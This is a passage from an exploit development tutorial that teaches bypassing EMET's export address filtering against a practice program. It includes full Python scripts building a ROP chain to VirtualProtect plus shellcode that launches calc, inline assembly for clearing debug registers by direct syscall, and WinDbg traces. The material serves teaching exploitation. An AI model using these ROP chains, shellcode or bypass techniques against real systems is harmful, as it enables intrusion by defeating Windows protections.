04h
],
 
eax
              
// clean dr0
 
        
mov
     
dword
 
ptr
 
[
ecx
 
+
 
08h
],
 
0x11223344
       
// just for debugging!
 
        
mov
     
dword
 
ptr
 
[
ecx
 
+
 
0Ch
],
 
eax
              
// clean dr2
 
        
mov
     
dword
 
ptr
 
[
ecx
 
+
 
10h
],
 
eax
              
// clean dr3
 
        
mov
     
dword
 
ptr
 
[
ecx
 
+
 
14h
],
 
eax
              
// clean dr6
 
        
mov
     
dword
 
ptr
 
[
ecx
 
+
 
18h
],
 
eax
              
// clean dr7
 
        
ret
 
    
skip
:
 
    
}
 
 
context
.
ContextFlags
 
=
 
CONTEXT_DEBUG_REGISTERS
;
 
    
GetThreadContext
(
GetCurrentThread
(),
 
&
context
);
 
    
if
 
(
context
.
Dr1
 
==
 
0x11223344
)
 
        
printf
(
"Everything OK!
\
n"
);
 
    
else
 
        
printf
(
"Something's wrong :(
\
n"
);
 
 
retur
n
 
0
;
 
}
 
 
The first part prints the offsets of 
EIP
 and the debug registers so that we can verify that the offsets in the 
asm code are correct. Then follows the actual code. Note that we assign 
0x11223344
 to 
dr1
 just for 
debugging purposes. At the end, we use
 
GetThreadContext
 to make sure that our method works.
 
This program won’t run correctly because of 
SAFESEH
.
 
Indeed, Visual Studio gives us the following warning:
 
1>c:
\
users
\
kiuhnm
\
documents
\
visual studio 2013
\
projects
\
tmp
\
tmp
\
tmp1.cpp(24): warning C4733: In
line asm assigning to 'F
S:0' : handler not registered as safe handler
 
Let’s disable SAFESEH by going to 
Project
→
properties
 and modifying the configuration for 
Release
 as 
follows:
 

 
Configuration Properties
 
o
 
Linker
 

 
Advanced
 

 
Image Has Safe Exception Handlers
: N
o (/SAFESEH:NO)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 260 
-
 
Now the program should work correctly.
 
We won’t have problems with SAFESEH when we put that code in our shellcode because our code will be 
on the stack and not inside the image of 
exploitme3
.
 
Here’s the 
Python
 script to create 
name.dat
:
 
Pyt
hon
 
 
import
 
struct
 
 
# The signature of VirtualProtect is the following:
 
#   BOOL WINAPI VirtualProtect(
 
#     _In_   LPVOID lpAddress,
 
#     _In_   SIZE_T dwSize,
 
#     _In_   DWORD flNewProtect,
 
#     _Out_  PDWORD lpflOldProtect
 
#   );
 
 
# After PUSHAD 
is executed, the stack looks like this:
 
#   .
 
#   .
 
#   .
 
#   EDI (ptr to ROP NOP (RETN))
 
#   ESI (ptr to JMP [EAX] (EAX = address of ptr to VirtualProtect))
 
#   EBP (ptr to POP (skips EAX on the stack))
 
#   ESP (lpAddress (automatic))
 
#   EBX (dwSize)
 
#  
 EDX (NewProtect (0x40 = PAGE_EXECUTE_READWRITE))
 
#   ECX (lpOldProtect (ptr to writeable address))
 
#   EAX (address of ptr to VirtualProtect)
 
# lpAddress:
 
#   ptr to "call esp"
 
#   <shellcode>
 
 
msvcr120
 
=
 
0x73c60000
 
 
# Delta used to fix the addresses ba
sed on the new base address of msvcr120.dll.
 
md
 
=
 
msvcr120
 
-
 
0x70480000
 
 
def
 
create_rop_chain
(
code_size
):
 
    
rop_gadgets
 
=
 
[
 
      
md
 
+
 
0x7053fc6f
,
  
# POP EBP # RETN [MSVCR120.dll]
 
      
md
 
+
 
0x7053fc6f
,
  
# skip 4 bytes [MSVCR120.dll]
 
      
md
 
+
 
0x704f
00f6
,
  
# POP EBX # RETN [MSVCR120.dll]
 
      
code_size
,
        
# code_size 
-
> ebx
 
      
md
 
+
 
0x704b6580
,
  
# POP EDX # RETN [MSVCR120.dll]
 
      
0x00000040
,
       
# 0x00000040
-
> edx
 
      
md
 
+
 
0x7049f8cb
,
  
# POP ECX # RETN [MSVCR120.dll]
 
      
md
 
+
 
0x705658
f2
,
  
# &Writable location [MSVCR120.dll]
 
      
md
 
+
 
0x7048f95c
,
  
# POP EDI # RETN [MSVCR120.dll]
 
      
md
 
+
 
0x7048f607
,
  
# RETN (ROP NOP) [MSVCR120.dll]
 
      
md
 
+
 
0x704eb436
,
  
# POP ESI # RETN [MSVCR120.dll]
 
      
md
 
+
 
0x70493a17
,
  
# JMP [EAX] [MSVCR120.d
ll]
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 261 
-
 
      
md
 
+
 
0x7053b8fb
,
  
# POP EAX # RETN [MSVCR120.dll]
 
      
md
 
+
 
0x705651a4
,
  
# ptr to &VirtualProtect() [IAT MSVCR120.dll]
 
      
md
 
+
 
0x7053b7f9
,
  
# PUSHAD # RETN [MSVCR120.dll]
 
      
md
 
+
 
0x704b7e5d
,
  
# ptr to 'call esp' [MSVCR120.dll]
 
    
]
 
    
re
turn
 
''
.
join
(
struct
.
pack
(
'<I'
,
 
_
)
 
for
 
_
 
in
 
rop_gadgets
)
 
 
def
 
write_file
(
file_path
):
 
    
with
 
open
(
file_path
,
 
'wb'
)
 
as
 
f
:
 
        
ret_eip
 
=
 
md
 
+
 
0x7048f607
       
# RETN (ROP NOP) [MSVCR120.dll]
 
        
shellcode
 
=
 
(
 
            
"
\
xe8
\
xff
\
xff
\
xff
\
xff
\
xc0
\
x5f
\
xb9
\
x11
\
x03
\
x02
\
x02
\
x81
\
xf1
\
x02
\
x02"
 
+
 
            
"
\
x02
\
x02
\
x83
\
xc7
\
x1d
\
x33
\
xf6
\
xfc
\
x8a
\
x07
\
x3c
\
x02
\
x0f
\
x44
\
xc6
\
xaa"
 
+
 
            
"
\
xe2
\
xf6
\
x55
\
x8b
\
xec
\
x83
\
xec
\
x0c
\
x56
\
x57
\
xb9
\
x7f
\
xc0
\
xb4
\
x7b
\
xe8"
 
+
 
            
"
\
x55
\
x02
\
x02
\
x02
\
xb9
\
xe0
\
x53
\
x31
\
x4b
\
x
8b
\
xf8
\
xe8
\
x49
\
x02
\
x02
\
x02"
 
+
 
            
"
\
x8b
\
xf0
\
xc7
\
x45
\
xf4
\
x63
\
x61
\
x6c
\
x63
\
x6a
\
x05
\
x8d
\
x45
\
xf4
\
xc7
\
x45"
 
+
 
            
"
\
xf8
\
x2e
\
x65
\
x78
\
x65
\
x50
\
xc6
\
x45
\
xfc
\
x02
\
xff
\
xd7
\
x6a
\
x02
\
xff
\
xd6"
 
+
 
            
"
\
x5f
\
x33
\
xc0
\
x5e
\
x8b
\
xe5
\
x5d
\
xc3
\
x33
\
xd2
\
xeb
\
x10
\
xc
1
\
xca
\
x0d
\
x3c"
 
+
 
            
"
\
x61
\
x0f
\
xbe
\
xc0
\
x7c
\
x03
\
x83
\
xe8
\
x20
\
x03
\
xd0
\
x41
\
x8a
\
x01
\
x84
\
xc0"
 
+
 
            
"
\
x75
\
xea
\
x8b
\
xc2
\
xc3
\
x8d
\
x41
\
xf8
\
xc3
\
x55
\
x8b
\
xec
\
x83
\
xec
\
x14
\
x53"
 
+
 
            
"
\
x56
\
x57
\
x89
\
x4d
\
xf4
\
x64
\
xa1
\
x30
\
x02
\
x02
\
x02
\
x89
\
x45
\
xfc
\
x8b
\
x45
"
 
+
 
            
"
\
xfc
\
x8b
\
x40
\
x0c
\
x8b
\
x40
\
x14
\
x8b
\
xf8
\
x89
\
x45
\
xec
\
x8b
\
xcf
\
xe8
\
xd2"
 
+
 
            
"
\
xff
\
xff
\
xff
\
x8b
\
x3f
\
x8b
\
x70
\
x18
\
x85
\
xf6
\
x74
\
x4f
\
x8b
\
x46
\
x3c
\
x8b"
 
+
 
            
"
\
x5c
\
x30
\
x78
\
x85
\
xdb
\
x74
\
x44
\
x8b
\
x4c
\
x33
\
x0c
\
x03
\
xce
\
xe8
\
x96
\
xff"
 
+
 
         
"
\
xff
\
xff
\
x8b
\
x4c
\
x33
\
x20
\
x89
\
x45
\
xf8
\
x03
\
xce
\
x33
\
xc0
\
x89
\
x4d
\
xf0"
 
+
 
            
"
\
x89
\
x45
\
xfc
\
x39
\
x44
\
x33
\
x18
\
x76
\
x22
\
x8b
\
x0c
\
x81
\
x03
\
xce
\
xe8
\
x75"
 
+
 
            
"
\
xff
\
xff
\
xff
\
x03
\
x45
\
xf8
\
x39
\
x45
\
xf4
\
x74
\
x1e
\
x8b
\
x45
\
xfc
\
x8b
\
x4d"
 
+
 
            
"
\
xf0
\
x40
\
x89
\
x45
\
xfc
\
x3b
\
x44
\
x33
\
x18
\
x72
\
xde
\
x3b
\
x7d
\
xec
\
x75
\
x9c"
 
+
 
            
"
\
x33
\
xc0
\
x5f
\
x5e
\
x5b
\
x8b
\
xe5
\
x5d
\
xc3
\
x8b
\
x4d
\
xfc
\
x8b
\
x44
\
x33
\
x24"
 
+
 
            
"
\
x8d
\
x04
\
x48
\
x0f
\
xb7
\
x0c
\
x30
\
x8b
\
x44
\
x33
\
x1c
\
x8d
\
x04
\
x88
\
x8b
\
x04"
 
+
 
            
"
\
x30
\
x03
\
xc6
\
xeb
\
xdd"
)
 
        
disable_EAF
 
=
 
(
 
            
"
\
xE8
\
x00
\
x00
\
x00
\
x00"
 
+
            
# call here (013E1008h)
 
        
#here:
 
            
"
\
x83
\
x04
\
x24
\
x22"
 
+
                
# add dword ptr [esp],22h  ; [esp] = handler
 
            
"
\
x64
\
xFF
\
x35
\
x00
\
x00
\
x00
\
x00"
 
+
    
# p
ush dword ptr fs:[0]
 
            
"
\
x64
\
x89
\
x25
\
x00
\
x00
\
x00
\
x00"
 
+
    
# mov dword ptr fs:[0],esp
 
            
"
\
x33
\
xC0"
 
+
                        
# xor eax,eax
 
            
"
\
xF7
\
xF0"
 
+
                        
# div eax,eax
 
            
"
\
x64
\
x8F
\
x05
\
x00
\
x00
\
x0
0
\
x00"
 
+
    
# pop dword ptr fs:[0]
 
            
"
\
x83
\
xC4
\
x04"
 
+
                    
# add esp,4
 
            
"
\
xEB
\
x1A"
 
+
                        
# jmp here+3Dh (013E1045h)  ; jmp skip
 
        
#handler:
 
            
"
\
x8B
\
x4C
\
x24
\
x0C"
 
+
                
# mov ec
x,dword ptr [esp+0Ch]
 
            
"
\
x83
\
x81
\
xB8
\
x00
\
x00
\
x00
\
x02"
 
+
    
# add dword ptr [ecx+0B8h],2
 
            
"
\
x33
\
xC0"
 
+
                        
# xor eax,eax
 
            
"
\
x89
\
x41
\
x04"
 
+
                    
# mov dword ptr [ecx+4],eax
 
            
"
\
x89
\
x
41
\
x08"
 
+
                    
# mov dword ptr [ecx+8],eax
 
            
"
\
x89
\
x41
\
x0C"
 
+
                    
# mov dword ptr [ecx+0Ch],eax
 
            
"
\
x89
\
x41
\
x10"
 
+
                    
# mov dword ptr [ecx+10h],eax
 
            
"
\
x89
\
x41
\
x14"
 
+
               
     
# mov dword ptr [ecx+14h],eax
 
            
"
\
x89
\
x41
\
x18"
 
+
                    
# mov dword ptr [ecx+18h],eax
 
            
"
\
xC3"
                              
# ret
 
        
#skip:
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 262 
-
 
        
)
 
        
code
 
=
 
disable_EAF
 
+
 
shellcode
 
        
name
 
=
 
'a'
*
36
 
+
 
s
truct
.
pack
(
'<I'
,
 
ret_eip
)
 
+
 
create_rop_chain
(
len
(
code
))
 
+
 
code
 
        
f
.
write
(
name
)
 
 
write_file
(
r'c:
\
deleteme
\
name.dat'
)
 
 
If we run 
exploitme3
, we get a crash. Maybe we did something wrong?
 
Let’s debug the program in WinDbg. We open 
exploitme3.exe
 in Win
Dbg and then we press 
F5
 (go). We get 
the familiar single step exception so we issue the command 
sxd sse
 and hit 
F5
 again. As expected, we get 
an 
Integer divide
-
by
-
zero exception
:
 
(610.a58): Integer divide
-
by
-
zero 
-
 code c0000094 (first chance)
 
First chanc
e exceptions are reported before any exception handling.
 
This exception may be expected and handled.
 
eax=00000000 ebx=0000017c ecx=89dd0000 edx=0021ddb8 esi=73c73a17 edi=73c6f607
 
eip=0015d869 esp=0015d844 ebp=73d451a4 iopl=0         nv up ei pl zr na pe nc
 
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
 
0015d869 f7f0            div     eax,eax
 
This is a 
first chance
 exception so if we press 
F5
 (go) again, the exception will be passed to the program. 
Before proceeding, let’s exa
mine the exception chain:
 
0:000> !exchain
 
0015d844: 0015d877
 
0015ff50: exploitme3!_except_handler4+0 (00381739)
 
  CRT scope  0, filter: exploitme3!__tmainCRTStartup+115 (003812ca)
 
                func:   exploitme3!__tmainCRTStartup+129 (003812de)
 
0015ff9c
: ntdll!_except_handler4+0 (76f071f5)
 
  CRT scope  0, filter: ntdll!__RtlUserThreadStart+2e (76f074d0)
 
                func:   ntdll!__RtlUserThreadStart+63 (76f090eb)
 
Everything seems correct!
 
When we hit 
F5
 (go) we get this:
 
(610.a58): Integer divide
-
by
-
zero 
-
 code c0000094 (!!! second chance !!!)
 
eax=00000000 ebx=0000017c ecx=89dd0000 edx=0021ddb8 esi=73c73a17 edi=73c6f607
 
eip=0015d869 esp=0015d844 ebp=73d451a4 iopl=0         nv up ei pl zr na pe nc
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 263 
-
 
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b   
          efl=00010246
 
0015d869 f7f0            div     eax,eax
 
Why doesn’t the program handle the exception? The culprit is SafeSEH!
 
I forgot that it’s not enough for a handler not to be in a SafeSEH module: it mustn’t be on the stack either!
 
Clearing the
 debug registers (3)
 
SafeSEH may be bypassed but probably not without using some hardcoded addresses, which defeats the 
purpose.
 
I want to add that if we hadn’t reserved more space on the stack by allocating on the stack the array 
moreStack
 (see the initia
l C/C++ source code), our shellcode would’ve overwritten the exception chain and 
SEHOP would’ve stopped our exploit anyway. SEHOP checks that the exception chain ends with 
ntdll!_except_handler4
. We can’t restore the exception chain if we don’t know the ad
dress of that handler. 
So, this path is not a viable one.
 
Another way to clear the debug registers is to use 
kernel32!SetThreadContext
. While it’s true that we don’t 
have the address of such function, we shouldn’t give up just yet. We know that 
SetThreadCo
ntext
 can’t clear 
the debug registers in user mode so it must call some 
ring 0
 service at some point.
 
Ring 0 services are usually called through interrupts or specific CPU instructions like 
SYSENTER
 (Intel) and 
SYSCALL
 (AMD). Luckily for us, these services
 are usually identified by small constants which are 
hardcoded in the OS and thus don’t change with reboots or even with updates and new service packs.
 
Let’s start by writing a little program in C/C++:
 
C++
 
 
#include <Windows.h>
 
#include <stdio.h>
 
 
int
 
mai
n
()
 
{
 
    
CONTEXT
 
context
;
 
    
context
.
ContextFlags
 
=
 
CONTEXT_DEBUG_REGISTERS
;
 
    
context
.
Dr0
 
=
 
0
;
 
    
context
.
Dr1
 
=
 
0
;
 
    
context
.
Dr2
 
=
 
0
;
 
    
context
.
Dr3
 
=
 
0
;
 
    
context
.
Dr6
 
=
 
0
;
 
    
context
.
Dr7
 
=
 
0
;
 
 
if
 
(!
SetThreadContext
(
GetCurrentThread
(),
 
&
co
ntext
))
 
        
printf
(
"Error!
\
n"
);
 
    
else
 
        
printf
(
"OK!
\
n"
);
 
 
return
 
0
;
 
}
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 264 
-
 
Now let’s debug it in WinDbg. Put a breakpoint on 
kernel32!SetThreadContext
 and hit 
F5
 (go). 
SetThreadContext
 is very short:
 
kernel32!SetThreadContext:
 
764358d3 8bff  
          mov     edi,edi
 
764358d5 55              push    ebp
 
764358d6 8bec            mov     ebp,esp
 
764358d8 ff750c          push    dword ptr [ebp+0Ch]      <
---------
 002df954 = &context
 
764358db ff7508          push    dword ptr [ebp+8]        <
----
-----
 0xfffffffe = GetCurrentThread()
 
764358de ff15f8013b76    call    dword ptr [kernel32!_imp__NtSetContextThread (763b01f8)]
 
764358e4 85c0            test    eax,eax
 
764358e6 7d0a            jge     kernel32!SetThreadContext+0x1f (764358f2)
 
764358e8 50 
             push    eax
 
764358e9 e846bdf7ff      call    kernel32!BaseSetLastNTError (763b1634)
 
764358ee 33c0            xor     eax,eax
 
764358f0 eb03            jmp     kernel32!SetThreadContext+0x22 (764358f5)
 
764358f2 33c0            xor     eax,eax
 
76
4358f4 40              inc     eax
 
764358f5 5d              pop     ebp
 
764358f6 c20800          ret     8
 
Note the two parameters passed to the first call. Clearly, we want to step inside that call:
 
ntdll!ZwSetBootOptions:
 
76eb1908 b84f010000      mov    
 eax,14Fh
 
76eb190d 33c9            xor     ecx,ecx
 
76eb190f 8d542404        lea     edx,[esp+4]
 
76eb1913 64ff15c0000000  call    dword ptr fs:[0C0h]
 
76eb191a 83c404          add     esp,4
 
76eb191d c20800          ret     8
 
ntdll!ZwSetContextThread:        
 <
------------------------
 we are here!
 
76eb1920 b850010000      mov     eax,150h
 
76eb1925 33c9            xor     ecx,ecx
 
76eb1927 8d542404        lea     edx,[esp+4]
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 265 
-
 
76eb192b 64ff15c0000000  call    dword ptr fs:[0C0h]
 
76eb1932 83c404          add     es
p,4
 
76eb1935 c20800          ret     8
 
ntdll!NtSetDebugFilterState:
 
76eb1938 b851010000      mov     eax,151h
 
76eb193d b90a000000      mov     ecx,0Ah
 
76eb1942 8d542404        lea     edx,[esp+4]
 
76eb1946 64ff15c0000000  call    dword ptr fs:[0C0h]
 
76eb194
d 83c404          add     esp,4
 
76eb1950 c20c00          ret     0Ch
 
76eb1953 90              nop
 
This looks very interesting! What is this call? Above and below we can see other similar functions with 
different values for 
EAX
. 
EAX
 might be the 
service num
ber
. The immediate value of the 
ret
 instruction 
depends on the number of arguments, of course.
 
Note that 
edx
 will point to the two arguments on the stack:
 
0:000> dd edx L2
 
002df93c  fffffffe 002df954
 
Let’s step into the call:
 
747e2320 ea1e277e743300  jmp  
   0033:747E271E
 
A 
far jump
: how interesting! When we step on it we find ourselves right after the 
call
 instruction:
 
ntdll!ZwQueryInformationProcess:
 
  76eafad8 b816000000      mov     eax,16h
 
  76eafadd 33c9            xor     ecx,ecx
 
  76eafadf 8d542404 
       lea     edx,[esp+4]
 
  76eafae3 64ff15c0000000  call    dword ptr fs:[0C0h]
 
  76eafaea 83c404          add     esp,4      <
---------------------
 we are here!
 
  76eafaed c21400          ret     14h
 
Why does this happen and what’s the purpose of a 
far 
jump
? Maybe it’s used for transitioning to 64
-
bit 
code? Repeat the whole process in the 64
-
bit version of WinDbg and the jump will lead you here:
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 266 
-
 
wow64cpu!CpupReturnFromSimulatedCode:
 
00000000`747e271e 67448b0424      mov     r8d,dword ptr [esp] ds:0000000
0`0037f994=76eb1932
 
00000000`747e2723 458985bc000000  mov     dword ptr [r13+0BCh],r8d
 
00000000`747e272a 4189a5c8000000  mov     dword ptr [r13+0C8h],esp
 
00000000`747e2731 498ba42480140000 mov     rsp,qword ptr [r12+1480h]
 
00000000`747e2739 4983a4248014000
000 and   qword ptr [r12+1480h],0
 
00000000`747e2742 448bda          mov     r11d,edx
 
We were right! If we keep stepping we come across the following call:
 
00000000`747e276e 8bc8            mov     ecx,eax
 
00000000`747e2770 ff150ae9ffff    call    qword ptr
 [wow64cpu!_imp_Wow64SystemServiceEx (00000000`747e1080)]
 
Note that 
ecx
 is 
150
, our service number. We don’t need to go so deep. Anyway, eventually we reach the 
following code:
 
ntdll!NtSetInformationThread:
 
00000000`76d01380 4c8bd1          mov     r10,rcx
 
00000000`76d01383 b80a000000      mov     eax,0Ah
 
00000000`76d01388 0f05            syscall
 
00000000`76d0138a c3              ret
 
So, to call a ring 0 service there are two transitions:
 
1
.
 
from
 32
-
bit
 ring 3 code to 
64
-
bit
 ring 3 code
 
2
.
 
from 64
-
bit 
ring 3
 code
 to 64
-
bit 
ring 0
 code
 
But we don’t need to deal with all this. All we need to do is:
 
1
.
 
set 
EAX = 0x150
 
2
.
 
clear 
ECX
 
3
.
 
make 
EDX
 point to our arguments
 
4
.
 
call the code pointed to by 
fs:[0xc0]
 
As we can see, this code is not susceptible to ASLR.
 
Now we can finally wr
ite the code to clear the debug registers:
 
Assembly (x86)
 
 
mov
     
eax
,
 
150h
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 267 
-
 
xor
     
ecx
,
 
ecx
 
sub
     
esp
,
 
2cch
                       
; makes space for CONTEXT
 
mov
     
dword
 
ptr
 
[
esp
],
 
10010h
         
; CONTEXT_DEBUG_REGISTERS
 
mov
     
dword
 
ptr
 
[
esp
 
+
 
4
],
 
e
cx
        
; context.Dr0 = 0
 
mov
     
dword
 
ptr
 
[
esp
 
+
 
8
],
 
ecx
        
; context.Dr1 = 0
 
mov
     
dword
 
ptr
 
[
esp
 
+
 
0ch
],
 
ecx
      
; context.Dr2 = 0
 
mov
     
dword
 
ptr
 
[
esp
 
+
 
10h
],
 
ecx
      
; context.Dr3 = 0
 
mov
     
dword
 
ptr
 
[
esp
 
+
 
14h
],
 
ecx
      
; context.Dr6 
= 0
 
mov
     
dword
 
ptr
 
[
esp
 
+
 
18h
],
 
ecx
      
; context.Dr7 = 0
 
push
    
esp
 
push
    
0fffffffeh
                      
; current thread
 
mov
     
edx
,
 
esp
 
call
    
dword
 
ptr
 
fs
 
:
 
[
0C0h
]
           
; this also decrements ESP by 4
 
add
     
esp
,
 
4
 
+
 
2cch
 
+
 
8
 
 
At the en
d of the code, we restore 
ESP
 but that’s not strictly necessary.
 
Here’s the complete Python script:
 
Python
 
 
import
 
struct
 
 
# The signature of VirtualProtect is the following:
 
#   BOOL WINAPI VirtualProtect(
 
#     _In_   LPVOID lpAddress,
 
#     _In_   SIZE
_T dwSize,
 
#     _In_   DWORD flNewProtect,
 
#     _Out_  PDWORD lpflOldProtect
 
#   );
 
 
# After PUSHAD is executed, the stack looks like this:
 
#   .
 
#   .
 
#   .
 
#   EDI (ptr to ROP NOP (RETN))
 
#   ESI (ptr to JMP [EAX] (EAX = address of ptr to VirtualProte
ct))
 
#   EBP (ptr to POP (skips EAX on the stack))
 
#   ESP (lpAddress (automatic))
 
#   EBX (dwSize)
 
#   EDX (NewProtect (0x40 = PAGE_EXECUTE_READWRITE))
 
#   ECX (lpOldProtect (ptr to writeable address))
 
#   EAX (address of ptr to VirtualProtect)
 
# lpAddres
s:
 
#   ptr to "call esp"
 
#   <shellcode>
 
 
msvcr120
 
=
 
0x73c60000
 
 
# Delta used to fix the addresses based on the new base address of msvcr120.dll.
 
md
 
=
 
msvcr120
 
-
 
0x70480000
 
 
def
 
create_rop_chain
(
code_size
):
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 268 
-
 
    
rop_gadgets
 
=
 
[
 
      
md
 
+
 
0x7053fc6f
,
  
# POP EBP # RETN [MSVCR120.dll]
 
      
md
 
+
 
0x7053fc6f
,
  
# skip 4 bytes [MSVCR120.dll]
 
      
md
 
+
 
0x704f00f6
,
  
# POP EBX # RETN [MSVCR120.dll]
 
      
code_size
,
        
# code_size 
-
> ebx
 
      
md
 
+
 
0x704b6580
,
  
# POP EDX # RETN [MSVCR120.dll]
 
      
0x0000004
0
,
       
# 0x00000040
-
> edx
 
      
md
 
+
 
0x7049f8cb
,
  
# POP ECX # RETN [MSVCR120.dll]
 
      
md
 
+
 
0x705658f2
,
  
# &Writable location [MSVCR120.dll]
 
      
md
 
+
 
0x7048f95c
,
  
# POP EDI # RETN [MSVCR120.dll]
 
      
md
 
+
 
0x7048f607
,
  
# RETN (ROP NOP) [MSVCR120.dll]
 
      
md
 
+
 
0x704eb436
,
  
# POP ESI # RETN [MSVCR120.dll]
 
      
md
 
+
 
0x70493a17
,
  
# JMP [EAX] [MSVCR120.dll]
 
      
md
 
+
 
0x7053b8fb
,
  
# POP EAX # RETN [MSVCR120.dll]
 
      
md
 
+
 
0x705651a4
,
  
# ptr to &VirtualProtect() [IAT MSVCR120.dll]
 
      
md
 
+
 
0x7053b7f9
,
 
 
# PUSHAD # RETN [MSVCR120.dll]
 
      
md
 
+
 
0x704b7e5d
,
  
# ptr to 'call esp' [MSVCR120.dll]
 
    
]
 
    
return
 
''
.
join
(
struct
.
pack
(
'<I'
,
 
_
)
 
for
 
_
 
in
 
rop_gadgets
)
 
 
def
 
write_file
(
file_path
):
 
    
with
 
open
(
file_path
,
 
'wb'
)
 
as
 
f
:
 
        
ret_eip
 
=
 
md
 
+
 
0x7048
f607
       
# RETN (ROP NOP) [MSVCR120.dll]
 
        
shellcode
 
=
 
(
 
            
"
\
xe8
\
xff
\
xff
\
xff
\
xff
\
xc0
\
x5f
\
xb9
\
x11
\
x03
\
x02
\
x02
\
x81
\
xf1
\
x02
\
x02"
 
+
 
            
"
\
x02
\
x02
\
x83
\
xc7
\
x1d
\
x33
\
xf6
\
xfc
\
x8a
\
x07
\
x3c
\
x02
\
x0f
\
x44
\
xc6
\
xaa"
 
+
 
            
"
\
xe2
\
xf6
\
x55
\
x8b
\
xec
\
x83
\
xec
\
x0c
\
x56
\
x57
\
xb9
\
x7f
\
xc0
\
xb4
\
x7b
\
xe8"
 
+
 
            
"
\
x55
\
x02
\
x02
\
x02
\
xb9
\
xe0
\
x53
\
x31
\
x4b
\
x8b
\
xf8
\
xe8
\
x49
\
x02
\
x02
\
x02"
 
+
 
            
"
\
x8b
\
xf0
\
xc7
\
x45
\
xf4
\
x63
\
x61
\
x6c
\
x63
\
x6a
\
x05
\
x8d
\
x45
\
xf4
\
xc7
\
x45"
 
+
 
            
"
\
xf8
\
x2e
\
x65
\
x78
\
x65
\
x50
\
xc6
\
x45
\
xfc
\
x02
\
xff
\
xd7
\
x6a
\
x02
\
xff
\
xd6"
 
+
 
            
"
\
x5f
\
x33
\
xc0
\
x5e
\
x8b
\
xe5
\
x5d
\
xc3
\
x33
\
xd2
\
xeb
\
x10
\
xc1
\
xca
\
x0d
\
x3c"
 
+
 
            
"
\
x61
\
x0f
\
xbe
\
xc0
\
x7c
\
x03
\
x83
\
xe8
\
x20
\
x03
\
xd0
\
x41
\
x8a
\
x01
\
x84
\
xc0"
 
+
 
            
"
\
x75
\
xea
\
x8b
\
xc2
\
xc3
\
x8d
\
x41
\
xf8
\
xc3
\
x55
\
x
8b
\
xec
\
x83
\
xec
\
x14
\
x53"
 
+
 
            
"
\
x56
\
x57
\
x89
\
x4d
\
xf4
\
x64
\
xa1
\
x30
\
x02
\
x02
\
x02
\
x89
\
x45
\
xfc
\
x8b
\
x45"
 
+
 
            
"
\
xfc
\
x8b
\
x40
\
x0c
\
x8b
\
x40
\
x14
\
x8b
\
xf8
\
x89
\
x45
\
xec
\
x8b
\
xcf
\
xe8
\
xd2"
 
+
 
            
"
\
xff
\
xff
\
xff
\
x8b
\
x3f
\
x8b
\
x70
\
x18
\
x85
\
xf6
\
x74
\
x4f
\
x8b
\
x4
6
\
x3c
\
x8b"
 
+
 
            
"
\
x5c
\
x30
\
x78
\
x85
\
xdb
\
x74
\
x44
\
x8b
\
x4c
\
x33
\
x0c
\
x03
\
xce
\
xe8
\
x96
\
xff"
 
+
 
            
"
\
xff
\
xff
\
x8b
\
x4c
\
x33
\
x20
\
x89
\
x45
\
xf8
\
x03
\
xce
\
x33
\
xc0
\
x89
\
x4d
\
xf0"
 
+
 
            
"
\
x89
\
x45
\
xfc
\
x39
\
x44
\
x33
\
x18
\
x76
\
x22
\
x8b
\
x0c
\
x81
\
x03
\
xce
\
xe8
\
x75"
 
+
 
            
"
\
xff
\
xff
\
xff
\
x03
\
x45
\
xf8
\
x39
\
x45
\
xf4
\
x74
\
x1e
\
x8b
\
x45
\
xfc
\
x8b
\
x4d"
 
+
 
            
"
\
xf0
\
x40
\
x89
\
x45
\
xfc
\
x3b
\
x44
\
x33
\
x18
\
x72
\
xde
\
x3b
\
x7d
\
xec
\
x75
\
x9c"
 
+
 
            
"
\
x33
\
xc0
\
x5f
\
x5e
\
x5b
\
x8b
\
xe5
\
x5d
\
xc3
\
x8b
\
x4d
\
xfc
\
x8b
\
x44
\
x33
\
x24"
 
+
 
            
"
\
x8d
\
x04
\
x48
\
x0f
\
xb7
\
x0c
\
x30
\
x8b
\
x44
\
x33
\
x1c
\
x8d
\
x04
\
x88
\
x8b
\
x04"
 
+
 
            
"
\
x30
\
x03
\
xc6
\
xeb
\
xdd"
)
 
        
disable_EAF
 
=
 
(
 
            
"
\
xB8
\
x50
\
x01
\
x00
\
x00"
 
+
            
# mov    eax,150h
 
            
"
\
x33
\
xC9"
 
+
                        
# xor    ecx,e
cx
 
            
"
\
x81
\
xEC
\
xCC
\
x02
\
x00
\
x00"
 
+
        
# sub    esp,2CCh
 
            
"
\
xC7
\
x04
\
x24
\
x10
\
x00
\
x01
\
x00"
 
+
    
# mov    dword ptr [esp],10010h
 
            
"
\
x89
\
x4C
\
x24
\
x04"
 
+
                
# mov    dword ptr [esp+4],ecx
 
            
"
\
x89
\
x4C
\
x24
\
x0
8"
 
+
                
# mov    dword ptr [esp+8],ecx
 
            
"
\
x89
\
x4C
\
x24
\
x0C"
 
+
                
# mov    dword ptr [esp+0Ch],ecx
 
            
"
\
x89
\
x4C
\
x24
\
x10"
 
+
                
# mov    dword ptr [esp+10h],ecx
 
            
"
\
x89
\
x4C
\
x24
\
x14"
 
+
           
     
# mov    dword ptr [esp+14h],ecx
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 269 
-
 
            
"
\
x89
\
x4C
\
x24
\
x18"
 
+
                
# mov    dword ptr [esp+18h],ecx
 
            
"
\
x54"
 
+
                            
# push   esp
 
            
"
\
x6A
\
xFE"
 
+
                        
# push   0FFFFFFFEh
 
        
"
\
x8B
